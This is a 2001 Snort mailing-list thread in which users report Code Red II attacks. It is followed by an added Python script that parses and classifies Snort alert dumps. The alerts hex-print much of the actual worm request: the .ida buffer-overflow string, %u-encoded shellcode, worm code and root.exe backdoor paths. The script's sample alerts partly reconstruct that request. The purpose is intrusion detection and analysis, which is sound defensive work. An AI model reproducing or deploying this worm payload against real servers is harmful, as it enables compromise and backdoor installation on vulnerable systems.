Snort mailing list archives

Code Red II


From: "Murphy" <murphy () infomaniak ch>
Date: Sun, 5 Aug 2001 08:20:45 +0200

Yup, I've also seen this new outcrop, there is some more info in a discussion
going on over here:
http://grc.com/x/talk.exe?cmd=article&group=grc.security&item=21298&utag=
and here
http://www.incidents.org/diary/diary.php

In the same period of time, I've logged twice as many CodeRed II as *good
old* CodeRed v1/v2.

From what I read it seems that most of the new variant has seeded the @Home
domain, so we're dealing with lots of home users that very probably don't
really know what's going on on their server.
I think putting some pressure on the larger ISPs (@Home, etc.) to push
them to be more *aggressive* with infected home users should be considered.
Because with such a huge pool of unchecked servers, it's not getting any
easier for the worm to go the way of the dodo.

Murphy

-----Original Message-----
From: snort-users-admin () lists sourceforge net
[mailto:snort-users-admin () lists sourceforge net]On Behalf Of jaywhy
Sent: Sunday, August 05, 2001 00:32
To: snort-users () lists sourceforge net
Subject: [Snort-users] Code Red II


I have been noticing a new version of the Code Red worm.  At first I got
logs just trying to access the default.ida exploit, which is the standard
Code Red worm.

Code Red II does the original exploit but I guess if that doesn't work it
tries WEB-IIS cmd.exe access.  The WEB-IIS cmd.exe exploit I believe was
part of the sadmind worm.  That worm infected Solaris systems through a
buffer overflow, then searched for Windows comps running IIS.

I've been getting a lot of these so it's been spreading.

[**] WEB-IIS ISAPI .ida attempt [**]
08/04-17:01:06.320498 65.80.21.130:4594 -> 65.1.151.143:80
TCP TTL:111 TOS:0x0 ID:51825 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x498FD68A  Ack: 0xCF75FF5D  Win: 0x4470  TcpLen: 20
47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61  GET /default.ida
3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  ?XXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  X%u9090%u6858%uc
62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30  u6858%ucbd3%u780
31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  1%u9090%u6858%uc
62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63  u9090%u8190%u00c
33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35  3%u0003%u8b00%u5
33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25  31b%u53ff%u0078%
75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54  u0000%u00=a  HTT
50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74  P/1.0..Content-t
79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F  ype: text/xml.Co
6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33  ntent-length: 33
37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00  79 ........`....
00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00  ....dg.6..dg.&..
E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF  .....h......\...
50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40  P.U...\...P.U..@
10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00  .....X....U.=...
00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6  ....=...........
C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00  ...T....u..~0...
00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A  ........F0......
00 00 00 43 6F 64 65 52 65 64 49 49 00 8B 1C 24  ...CodeRedII...$
FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF C7 85 50  .U.f.....8.....P
FE FF FF 01 00 00 00 6A 00 8D 85 50 FE FF FF 50  .......j...P...P
8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 FF 90 84  ..8...P.E..p....
00 00 00 80 BD 38 FE FF FF 01 74 68 53 FF 55 D4  .....8....thS.U.
FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C 01 00 00  .U..E.i.T...,...
81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7  ..,.............
89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 05 00 00  .F4.E.Pj..u.....
00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 50 FF 55  ......j.j..U.P.U
D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE FF FF 00  .Ou..;...i.T....
5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8 6A 00 6A  \&....\&.W.U.j.j
16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 34 29 45  ..U.j..U....F4)E
84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50 FF 55 C0  .jd.U...<...P.U.
0F B7 85 3C FE FF FF 3D D2 07 00 00 73 CF 0F B7  ...<...=....s...
85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85 70 FF FF  .>......s.f..p..
FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 64 04 00  ...f..r....P.d..
00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 FF 55 B8  ...t...j.j.j..U.
83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E 66 04 80  ...t..E.j.Th~f..
FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF FF FF 50  .u..U.Yj...p...P
FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 74 4B 33  .u..U........tK3
DB FF 55 94 3D 33 27 00 00 75 3F C7 85 68 FF FF  ..U.=3'..u?..h..
FF 0A 00 00 00 C7 85 6C FF FF FF 00 00 00 00 C7  .......l........
85 60 FF FF FF 01 00 00 00 8B 45 80 89 85 64 FF  .`........E...d.
FF FF 8D 85 68 FF FF FF 50 6A 00 8D 85 60 FF FF  ....h...Pj...`..
FF 50 6A 00 6A 01 FF 55 A0 93 6A 00 54 68 7E 66  .Pj.j..U..j.Th~f
04 80 FF 75 80 FF 55 A4 59 83 FB 01 75 31 E8 00  ...u..U.Y...u1..
00 00 00 58 2D D3 03 00 00 6A 00 68 EA 0E 00 00  ...X-....j.h....
50 FF 75 80 FF 55 AC 3D EA 0E 00 00 75 11 6A 00  P.u..U.=....u.j.
6A 01 8D 85 5C FE FF FF 50 FF 75 80 FF 55 A8 FF  j...\...P.u..U..
75 80 FF 55 B4 E9 E7 FE FF FF BB 00 00 DF 77 81  u..U..........w.
C3 00 00 01 00 81 FB 00 00 00 78 75 05 BB 00 00  ..........xu....
F0 BF 60 E8 0E 00 00 00 8B 64 24 08 64 67 8F 06  ..`......d$.dg..
00 00 58 61 EB D9 64 67 FF 36 00 00 64 67 89 26  ..Xa..dg.6..dg.&
00 00 66 81 3B 4D 5A 75 E3 8B 4B 3C 81 3C 0B 50  ..f.;MZu..K<.<.P
45 00 00 75 D7 8B 54 0B 78 03 D3 8B 42 0C 81 3C  E..u..T.x...B..<
03 4B 45 52 4E 75 C5 81 7C 03 04 45 4C 33 32 75  .KERNu..|..EL32u
BB 33 C9 49 8B 72 20 03 F3 FC 41 AD 81 3C 03 47  .3.I.r ...A..<.G
65 74 50 75 F5 81 7C 03 04 72 6F 63 41 75 EB 03  etPu..|..rocAu..
4A 10 49 D1 E1 03 4A 24 0F B7 0C 0B C1 E1 02 03  J.I...J$........
4A 1C 8B 04 0B 03 C3 89 44 24 24 64 67 8F 06 00  J.......D$$dg...
00 58 61 C3 E8 51 FF FF FF 89 5D FC 89 45 F8 E8  .Xa..Q....]..E..
0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41  ....LoadLibraryA
00 FF 75 FC FF 55 F8 89 45 F4 E8 0D 00 00 00 43  ..u..U..E......C
72 65 61 74 65 54 68 72 65 61 64 00 FF 75 FC FF  reateThread..u..
55 F8 89 45 F0 E8 0D 00 00 00 47 65 74 54 69 63  U..E......GetTic
6B 43 6F 75 6E 74 00 FF 75 FC FF 55 F8 89 45 EC  kCount..u..U..E.
E8 06 00 00 00 53 6C 65 65 70 00 FF 75 FC FF 55  .....Sleep..u..U
F8 89 45 E8 E8 17 00 00 00 47 65 74 53 79 73 74  ..E......GetSyst
65 6D 44 65 66 61 75 6C 74 4C 61 6E 67 49 44 00  emDefaultLangID.
FF 75 FC FF 55 F8 89 45 E4 E8 14 00 00 00 47 65  .u..U..E......Ge
74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79  tSystemDirectory
41 00 FF 75 FC FF 55 F8 89 45 E0 E8 0A 00 00 00  A..u..U..E......
43 6F 70 79 46 69 6C 65 41 00 FF 75 FC FF 55 F8  CopyFileA..u..U.
89 45 DC E8 10 00 00 00 47 6C 6F 62 61 6C 46 69  .E......GlobalFi
6E 64 41 74 6F 6D 41 00 FF 75 FC FF 55 F8 89 45  ndAtomA..u..U..E
D8 E8 0F 00 00 00 47 6C 6F 62 61 6C 41 64 64 41  ......GlobalAddA
74 6F 6D 41                                      tomA

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] WEB-IIS cmd.exe access [**]
08/04-17:01:06.373751 65.80.21.130:4594 -> 65.1.151.143:80
TCP TTL:111 TOS:0x0 ID:51826 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x498FDC3E  Ack: 0xCF75FF5D  Win: 0x4470  TcpLen: 20
00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43  ..u..U..E......C
6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55  loseHandle..u..U
F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74  ..E......_lcreat
00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F  ..u..U..E......_
6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8  lwrite..u..U..E.
E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC  ....._lclose..u.
FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79  .U..E......GetSy
73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89  stemTime..u..U..
45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C  E......WS2_32.DL
4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63  L..U..E......soc
6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00  ket..u..U..E....
00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75  ..closesocket..u
BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74  ..U..E......ioct
6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45  lsocket..u..U..E
A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75  ......connect..u
BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65  ..U..E......sele
63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00  ct..u..U..E.....
00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8  .send..u..U..E..
05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89  ....recv..u..U..
45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61  E......gethostna
6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00  me..u..U..E.....
00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF  .gethostbyname..
75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41  u..U..E......WSA
47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC  GetLastError..u.
FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33  .U..E......USER3
32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00  2.DLL..U..E.....
00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF  .ExitWindowsEx..
75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84  u..U..E...E.i...
08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1  ..@.E....xV4....
C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3  ........<.t.<.t.
C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1  ................
E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8  ................
E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF  ......... ......
FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF  ................
FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04  .............Y..
81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F  .#...#.X........
74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3  t....t.;.X...t..
68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D  h......\...P.U..
BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E  ..\........\CMD.
45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00  EXE.^.....cj....
00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72  ..d:\inetpub\scr
69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C  ipts\root.exe...
24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8  $....\...P.U.j..
2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C  +...d:\progra~1\
63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C  common~1\system\
4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B  MSADC\root.exe..
0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA  .$....\...P.U...
05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00  ....MZP.........
FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC  ............@...
00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C  ...........PE..L
01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0  ....*%).........
00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00  ................
00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00  ............ ...
00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00  .@..............
00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00  ............@...
04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00  ................
20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10   ...............
00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C  ............0...
01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10  ................
00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00  .......... ..`..
00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04  ........... ....
00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10  ..@.............
00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00  ...0............
00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC  ..........@.....
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC  ................
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC  ................
FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68  ..........h....h
D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE  . @..a...... @..
00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8  . @.....j.h. @..
4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31  L........h.'...1
01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A  .....h.$@.h?...j
00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00  .h. @.h.....2...
0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68  ..u&j.hT @.j.j.h
48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF  H @..5.$@.......
35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68  5.$@......h.$@.h
3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80  ?...j.hX @.h....
E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C  .......uU.. @..L
00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68  ..... @..B...j.h
B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8  . @.j.j.h. @..5.
24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A  $@......j.h. @.j
01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99  .j.h. @..5.$@...
00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7  ....5.$@........
05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0  ..$@.....h.$@.h.
20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40   @.h.$@.j.U.5.$@
00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B  ..`.....uI..$@..
C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81  .t@.. @..>.t6Ff.
7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20  ~.,,u...217....
40 00 89 35                                      @..5

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+



_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
http://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users

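Added example (not Snort's code and not from either poster): a small Python triage script for alert dumps in the layout shown above. It parses the [**] signature [**], address and Seq lines plus the hex columns, groups alerts by connection, checks whether each alert's Seq equals the previous Seq plus the previous payload length, and only then classifies the joined stream. The headers on the page make that check worth running: both alerts come from 65.80.21.130:4594, each datagram is 1500 bytes with 20-byte IP and TCP headers (1460 bytes of payload), and 0x498FD68A + 1460 = 0x498FDC3E, the Seq of the second alert, so the "cmd.exe access" rule fired on the \CMD.EXE and root.exe strings inside the continuation of the same request body rather than on a separate request. The X-versus-N filler test (Code Red II used X, the original Code Red used N), the CodeRedII marker string and the root.exe paths are taken from the dump as posted; the two sample alerts inside the script are constructed and shortened, not copied from the post.

```python
"""Parse Snort -d alert dumps like the ones above, put the TCP segments of one
connection back in order and classify the reassembled request.  Added example,
not Snort's code and not from the original post; the sample alerts at the bottom
are constructed (shortened) to mirror the posted ones."""
import re
from dataclasses import dataclass

HDR_RE = re.compile(r"^\[\*\*\] (.+?) \[\*\*\]$")
ADDR_RE = re.compile(r"^\S+ (\S+):(\d+) -> (\S+):(\d+)$")
SEQ_RE = re.compile(r"Seq: 0x([0-9A-Fa-f]+)")
# one dump line: up to 16 hex pairs, then two or more spaces and the ASCII column
HEX_RE = re.compile(r"^([0-9A-F]{2}(?: [0-9A-F]{2}){0,15})(?:\s{2,}.*)?$")
IDA_RE = re.compile(rb"GET /default\.ida\?(X+|N+)%u")   # X = Code Red II, N = original
PATH_RE = re.compile(rb"[A-Za-z]:\\[\x20-\x7e]*?root\.exe")  # dropped backdoor copies

@dataclass
class Segment:
    sig: str
    src: str = ""
    dst: str = ""
    seq: int = 0
    payload: bytes = b""

def parse_alerts(text):
    """Split on Snort's =+=+ separator lines and rebuild each alert's TCP payload."""
    segs = []
    for block in re.split(r"^=\+=\+.*$", text, flags=re.M):
        seg = None
        for line in block.splitlines():
            line = line.rstrip()
            if m := HDR_RE.match(line):
                seg = Segment(sig=m.group(1))
            elif seg is None:
                continue
            elif m := HEX_RE.match(line):
                seg.payload += bytes.fromhex(m.group(1))
            elif m := ADDR_RE.match(line):
                seg.src, seg.dst = f"{m[1]}:{m[2]}", f"{m[3]}:{m[4]}"
            elif m := SEQ_RE.search(line):
                seg.seq = int(m.group(1), 16)
        if seg is not None:
            segs.append(seg)
    return segs

def classify(payload):
    """Code Red family signals: .ida request line, filler byte, %u-encoded
    shellcode, the CodeRedII marker string, cmd.exe and root.exe paths."""
    m = IDA_RE.search(payload)
    filler = m.group(1)[:1].decode() if m else ""
    return {
        "ida_overflow": m is not None,
        "variant": {"X": "Code Red II", "N": "Code Red v1/v2"}.get(filler, "unknown"),
        "unicode_shellcode": b"%u" in payload,
        "marker": b"CodeRedII" in payload,
        "cmd_exe": b"cmd.exe" in payload.lower(),
        "backdoor_paths": sorted(set(PATH_RE.findall(payload))),
    }

def triage(alert_text):
    """Group alerts per connection, check that each Seq is the previous Seq plus
    the previous payload length, and classify the joined stream, not each packet."""
    flows = {}
    for s in sorted(parse_alerts(alert_text), key=lambda s: (s.src, s.dst, s.seq)):
        flows.setdefault((s.src, s.dst), []).append(s)
    report = {}
    for flow, parts in flows.items():
        contiguous = all(cur.seq == prev.seq + len(prev.payload)
                         for prev, cur in zip(parts, parts[1:]))
        data = b"".join(p.payload for p in parts)
        report[flow] = {"alerts": [p.sig for p in parts],
                        "contiguous": contiguous, "verdict": classify(data)}
    return report

def snort_dump(sig, src, dst, seq, payload):
    """Render one alert in the text layout of Snort -d output (test fixture only)."""
    lines = [f"[**] {sig} [**]", f"08/04-17:01:06.320498 {src} -> {dst}",
             f"TCP TTL:111 TOS:0x0 ID:51825 IpLen:20 DgmLen:{40 + len(payload)} DF",
             f"***A**** Seq: 0x{seq:08X}  Ack: 0xCF75FF5D  Win: 0x4470  TcpLen: 20"]
    for i in range(0, len(payload), 16):
        chunk = payload[i:i + 16]
        hexs = " ".join(f"{b:02X}" for b in chunk).ljust(47)
        asc = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{hexs}  {asc}")
    return "\n".join(lines) + "\n\n" + "=+" * 37 + "\n\n"

# Constructed sample: request line, X filler and %u prefix as in the posted dump,
# then a cut-down body; the second alert's Seq is exactly where the first ends.
SRC, DST, SEQ1 = "65.80.21.130:4594", "65.1.151.143:80", 0x498FD68A
BODY1 = (b"GET /default.ida?" + b"X" * 224
         + b"%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190"
         + b"%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0\r\n"
         + b"Content-type: text/xml\nContent-length: 3379 \r\n\r\n"
         + b"\xc8\xc8\x01\x00\x60\xe8\x03\x00\x00\x00\xcc\xeb\xfe" + b"\x90" * 19
         + b"CodeRedII\x00")
BODY2 = (b"\x90" * 11 + b"\\CMD.EXE\x00" + b"d:\\inetpub\\scripts\\root.exe\x00"
         + b"d:\\progra~1\\common~1\\system\\MSADC\\root.exe\x00")
SAMPLE = (snort_dump("WEB-IIS ISAPI .ida attempt", SRC, DST, SEQ1, BODY1)
          + snort_dump("WEB-IIS cmd.exe access", SRC, DST, SEQ1 + len(BODY1), BODY2))

if __name__ == "__main__":
    for flow, r in triage(SAMPLE).items():
        print(flow, r["alerts"], "contiguous:", r["contiguous"], r["verdict"])
```

Run it against a real Snort alert file (snort -d output) by reading the file into triage(); a flow whose "contiguous" flag is False has a gap or overlap between alerts and should be looked at packet by packet rather than as one request.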
